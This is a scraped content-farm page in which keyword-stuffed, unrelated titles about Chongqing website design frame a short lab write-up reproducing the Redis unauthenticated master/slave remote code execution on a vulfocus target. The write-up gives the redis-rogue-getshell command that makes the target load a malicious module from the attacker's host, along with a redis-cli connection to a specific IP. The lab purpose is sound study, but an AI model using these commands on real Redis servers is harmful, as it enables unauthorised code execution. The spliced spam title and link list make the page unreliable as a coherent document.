当前位置: 首页 > news >正文

重庆涪陵网站设计公司推荐设计与制作网站

重庆涪陵网站设计公司推荐,设计与制作网站,网站数据修改,太原论坛天涯社区1.复现环境与工具 环境是在vulfocus上面 工具:GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module 参考攻击使用方式与原理:https://vulhub.org/#/environments/redis/4-unacc/ 2.复现 需要一个外网的服务器做&…

1.复现环境与工具

环境是在vulfocus上面

工具:GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module

参考攻击使用方式与原理:https://vulhub.org/#/environments/redis/4-unacc/

2.复现

需要一个外网的服务器做,上传这个工具到服务器上进入这个文件夹里面后输入命令:
python3 redis-master.py -r 目的ip -p 目的端口 -L 你的ip -P 你开放的端口 -f RedisModulesSDK/exp.so -c "id"

出了一个file,搜了一下是由于这个文件用python3写的,要检查一下你的服务器上是不是python版本3.0以上,用where python查python的安装位置
ls -l 目录/py* 得到代python的所有文件,看有没有python3 ,他的命令是什么
参考:Linux系统安装Python3环境(超详细)-腾讯云开发者社区-腾讯云

我这里是装了的,名称为python3

这个要先根据他github上面的内容去做make之后再运行
python3 redis-master.py -r 目的ip -p 目的端口 -L 攻击者ip -P 对应端口 -f RedisModulesSDK/exp.so -c "id"redis-cli -h 123.58.224.8 -p 45635
用redis组件去连接上这个redis,之后按照我的理解来说应该是用redis写入公钥连接才对:

参考redis未授权访问-cnvd 2015-0755漏洞复现 - FreeBuf网络安全行业门户

但是去试的时候发现

好像是环境有点问题,没权限了
所以需要用写入web的方法去做,要换工具做
要是还是想得到flag的话就参考

未授权漏洞vulfocu靶场实战_vulfocus中redis未授权漏洞如何拿到falg-CSDN博客

vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557-CSDN博客

我太懒了,实在不想重新来过了

http://www.yayakq.cn/news/423757/

相关文章:

  • 吉林珠海网站建设房价即将迎来大涨
  • 怎么做网站免费的wordpress 主机服务主题
  • 极速网站推广专家2016做网站
  • 上海企业网站制作网站的动效怎么做的
  • 怎样用模块做网站建筑学院app网站
  • 做社交网站 投入云南 房地产网站建设
  • 网站建设深圳给源码沈阳网站建设 熊掌号
  • 怎么做网站前端商务网站规划与建设心得
  • 在菲律宾做网站推广怎么样如何免费制作微信小程序
  • 怎么改网站关键词如何提升网站搜索排名
  • 网站样版风格排版wordpress 博客样式
  • 网站主机查询wordpress安装二级目录
  • 网站建设如何提案给军方做网站套模板行不行
  • 上海遨游网站建设wordpress 菜单添加图标
  • 做网站需要提供些什么页面wordpress footer 链接
  • 柳州城市的城乡建设管理局网站阿里巴巴logo设计理念
  • 做窗帘什么网站wordpress 评论 折叠
  • 子域名做微信开放平台网站应用wordpress个性主题
  • 欧洲网站服务器网站效果图设计
  • 专业做财务公司网站建设工程部网站
  • 公司网站制作范文网络营销渠道类型有哪些
  • 天津企商网站建设公司WordPress 打赏插件
  • 高端网站制展厅设计手绘图
  • 没有网站可以做seo长春专业做网站公司哪家好
  • 网站备案期间哈尔滨房地产网站建设
  • cc域名做网站怎么样外贸移动商城网站建设
  • 南宁保洁网站建设网站不可以做哪些东西
  • 烟台网站推广山西省城乡住房建设厅网站
  • 那些网站可以上传自己做的视频中国十大传媒公司
  • 网站制作易捷网络php 网站换空间